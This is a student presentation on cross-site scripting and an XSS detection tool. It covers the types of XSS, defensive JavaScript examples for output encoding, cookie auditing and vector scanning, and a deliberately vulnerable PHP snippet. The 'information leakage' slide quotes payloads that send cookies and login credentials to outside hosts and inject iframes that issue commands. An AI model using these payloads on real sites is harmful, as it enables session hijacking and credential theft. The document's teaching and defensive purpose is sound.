Cross-Site Scripting (XSS) attack detection for web applications
http://sourceforge.net/projects/xssalert7/

Author: Arjun Jain (07104701)
Department of Computer Science and Information Technology
Jaypee Institute of Information Technology
Sector-62 Noida, Uttar Pradesh
Agenda
   Overview of XSS attacks
   Types of XSS attacks
   Example
   Limitations of the attack
   DOM security overview
   XSS Alert working model
   Demo
What is Cross-Site Scripting (XSS)?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found
in web applications that enables malicious attackers to inject client-side script into
web pages viewed by other users.

Types:

1: Reflected XSS

2: Stored XSS

3: DOM based XSS
   Ranked #1 in the OWASP 2007 Top 10
   Ranked #2 in the OWASP 2010 Top 10
   7 out of 10 sites have XSS (Jeremiah Grossman, WhiteHat Website Security
    Statistics Report, Oct 2007)
Reflected XSS
It detects all non-persistent XSS issues, which occur when a web application blindly
echoes parts of the HTTP request in the corresponding HTTP response HTML.

Example:

<?php
        // Vulnerable on purpose: the "name" request parameter is echoed into
        // the HTML response without any output encoding.
        $name = $_GET["name"];
        echo "Hey " . $name;
?>

$name may contain JavaScript.
Stored XSS
It refers to all XSS vulnerabilities where the adversary is able to permanently inject
the malicious script into the vulnerable application's storage. The result is that every
user who accesses the poisoned web page receives the injected script without further
action by the adversary.
DOM-based XSS
It is a special variant of reflected XSS, where logic errors in legitimate JavaScript
and careless use of client-side data (for example, values read from the URL) result in XSS.
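The following is an added example and not code from the slides or from XSS-Alert. It puts the reflected "Hey $name" page from the Reflected XSS slide and a DOM-based variant side by side, each in an unsafe and a hardened form, and adds the reflection check a scanner uses to tell the two apart. All function names, the probe string and the stand-in element object are this example's own assumptions.

```javascript
// Added example (not from the slides or the XSS-Alert project). Names and the
// constructed probe are this example's own.

// Encode the characters that carry meaning in an HTML text or attribute context.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Reflected XSS, unsafe: the request parameter is concatenated straight into
// the response body, so any markup in `name` becomes markup in the page.
function greetUnsafe(name) {
  return '<p>Hey ' + name + '</p>';
}

// Reflected XSS, hardened: output encoding is applied where the untrusted value
// enters the HTML context. The page still echoes the input, but as text.
function greetSafe(name) {
  return '<p>Hey ' + escapeHtml(name) + '</p>';
}

// DOM-based XSS: client-side code takes a value from location.hash and writes
// it into the document. `el` is a plain object standing in for a DOM element so
// the example runs under Node; in a browser, assigning innerHTML parses the
// string as HTML, while assigning textContent creates a text node only.
function renderHashUnsafe(el, hash) {
  el.innerHTML = '<h2>' + decodeURIComponent(hash.slice(1)) + '</h2>';
  return el;
}
function renderHashSafe(el, hash) {
  el.textContent = decodeURIComponent(hash.slice(1));
  return el;
}

// Reflection check: a scanner sends a probe containing HTML metacharacters and
// reports a finding only if the probe comes back byte-for-byte, i.e. unencoded.
// An encoded echo ("&lt;xsschk ...") is the expected, safe outcome.
function reflectsUnescaped(responseHtml, probe) {
  return responseHtml.includes(probe);
}

// Constructed probe: metacharacters only, no payload.
const PROBE = '<xsschk "\'>';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(greetUnsafe(PROBE), reflectsUnescaped(greetUnsafe(PROBE), PROBE)); // true
  console.log(greetSafe(PROBE), reflectsUnescaped(greetSafe(PROBE), PROBE));     // false
  console.log(renderHashUnsafe({}, '#' + encodeURIComponent(PROBE)));
  console.log(renderHashSafe({}, '#' + encodeURIComponent(PROBE)));
}
```

The check is deliberately strict: a response that contains the probe only in encoded form is treated as safe, because the encoding is exactly the fix the unsafe version lacks. For the DOM-based case the fix is the choice of sink, not encoding: writing untrusted text through textContent never creates elements, whatever the fragment contains.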
Example
[Screenshot slides: "Unvalidated input with XSS", "Unvalidated input in XSS"]
Unvalidated input resulted in a Cross-Site Scripting attack
and the theft of the administrator's cookies.
Types of information leakage
Client can reveal cookies to a 3rd party (session state, order info, etc.)
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script >

Client can reveal posted form items to a 3rd party (userID/passwd, etc.)
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server
www.trustedserver.com/xss.asp?name = <iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>

Client can be tricked into attacking other sites
/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>
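The first leak above works only because script on the page can read document.cookie. A session cookie set with the HttpOnly attribute is not exposed to script at all, so auditing the Set-Cookie headers an application sends is a cheap check to run alongside XSS testing. The code below is an added example, not part of the slides or of XSS-Alert; the function names and the two sample headers are constructed for it.

```javascript
// Added example (not from the slides). Parses Set-Cookie headers and reports
// which protections a session cookie is missing. Sample headers are constructed.

// Parse one Set-Cookie header into its name, value and an attribute map with
// lower-cased keys (attribute names are case-insensitive).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf('=');
    const key = (i === -1 ? a : a.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : a.slice(i + 1).trim();
  }
  return cookie;
}

// Report the protections missing from a session cookie:
//  HttpOnly  keeps it out of document.cookie (the leak shown above),
//  Secure    keeps it off plaintext HTTP,
//  SameSite  limits when browsers attach it to cross-site requests.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const missing = [];
  if (!c.attrs.httponly) missing.push('HttpOnly');
  if (!c.attrs.secure) missing.push('Secure');
  if (!c.attrs.samesite) missing.push('SameSite');
  return { name: c.name, missing };
}

// Constructed sample headers: one weak, one hardened.
const WEAK_COOKIE = 'JSESSIONID=abc123; Path=/';
const HARDENED_COOKIE = 'JSESSIONID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditSessionCookie(WEAK_COOKIE));     // missing: HttpOnly, Secure, SameSite
  console.log(auditSessionCookie(HARDENED_COOKIE)); // missing: []
}
```

HttpOnly does not remove the XSS itself: injected script can still issue requests in the user's session from inside the page. It removes the specific outcome the first payload above relies on, which is copying the cookie value to a third-party host.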
Limitations of these attacks
   Usually only one transaction with XSS code against the vulnerable site is obtained
   Most attacks are focused only on collecting cookies
   POST-based forms are seldom leveraged; attacks almost always use GET methods
   The attacker does not know the actual responses sent to the client
   Some experts recommend using POST, hidden form inputs and other session
    state info to limit XSS risks.
DOM Security Overview
   Child windows and same-site trust
   Scripts can interact between the two windows
   Script content can be loaded from anywhere (RPC/remote scripting is common)
   Images can be loaded from anywhere
   JavaScript can either be within <script></script> tags, loaded from elsewhere via
    <script src=remote.com>, or attached to many tags: <img src=javascript: onload=javascript:>
   Form GET/POST can be to another site or to a JavaScript action
   XSS allows DOM abuse, but still follows DOM rules
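The slide lists the places script can ride into a page: inline script blocks, external scripts from any origin, event-handler attributes on ordinary tags, and URLs that are really script. The following added example (not from the slides or XSS-Alert) scans an HTML fragment for exactly those constructs and reports each one, distinguishing same-site from off-site script sources. It is regex-based, so it is a triage aid rather than an HTML parser; the function names, the assumed first-party origin and the sample fragment are this example's own.

```javascript
// Added example (not from the slides). Heuristic scan of an HTML fragment for
// script-carrying constructs. Names, SITE_ORIGIN and SAMPLE are constructed.

const SITE_ORIGIN = 'https://www.example.test'; // assumed first-party origin

// True when a URL resolves to an origin other than the first-party one.
// Relative URLs resolve against SITE_ORIGIN; anything unparsable is untrusted.
function isOffSite(url) {
  try {
    return new URL(url, SITE_ORIGIN).origin !== SITE_ORIGIN;
  } catch (e) {
    return true;
  }
}

// Returns a list of { kind, detail } findings for the fragment.
function scanHtmlForScriptVectors(html) {
  const findings = [];
  let m;

  // 1. <script ...> tags: inline blocks, and external sources that are off-site.
  const scriptRe = /<script\b([^>]*)>/gi;
  while ((m = scriptRe.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    if (!src) findings.push({ kind: 'inline-script', detail: m[0] });
    else if (isOffSite(src[1])) findings.push({ kind: 'remote-script', detail: src[1] });
  }

  // 2./3. Walk every opening tag once for on* handlers and javascript: URLs.
  const tagRe = /<([a-z][a-z0-9]*)\b([^>]*)>/gi;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = m[2];
    // Event-handler attribute: whitespace, then on<letters>=. Requiring the
    // leading whitespace avoids matching "one=1" inside another attribute.
    const handlerRe = /(?:^|\s)(on[a-z]+)\s*=/gi;
    let h;
    while ((h = handlerRe.exec(attrs)) !== null) {
      findings.push({ kind: 'event-handler', detail: '<' + tag + ' ' + h[1].toLowerCase() + '=...>' });
    }
    // javascript: scheme in src or href (optionally quoted, optional leading space).
    if (/\b(?:src|href)\s*=\s*["']?\s*javascript:/i.test(attrs)) {
      findings.push({ kind: 'javascript-url', detail: '<' + tag + '>' });
    }
  }
  return findings;
}

// Constructed sample: benign markup plus one instance of each vector.
const SAMPLE = [
  '<p>Hello <b>world</b></p>',
  '<img src="/static/logo.png" alt="logo" title="one=1">',
  '<script>doSomething()</script>',
  '<script src="http://remote.com/lib.js"></script>',
  '<script src="/js/app.js"></script>',
  '<img src=x onerror=doSomething()>',
  '<a href="javascript:doSomething()">link</a>',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanHtmlForScriptVectors(SAMPLE)) console.log(f.kind, f.detail);
}
```

On the sample the scanner reports four findings in order: the inline block, the off-site script source, the onerror handler on the image, and the javascript: href; the same-site /js/app.js and the plain image are not reported. Because the matching is textual, markup that an HTML parser would repair (unclosed tags, attributes split across odd whitespace, encoded characters) can slip past it, which is why it is presented as a first-pass filter to feed a real parser, not a replacement for one.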
XSS Alert working model
Demo
Attack on Yahoo server with GET string "?q="
Final Result
Thank You!

XSS-Alert: Penetration testing tool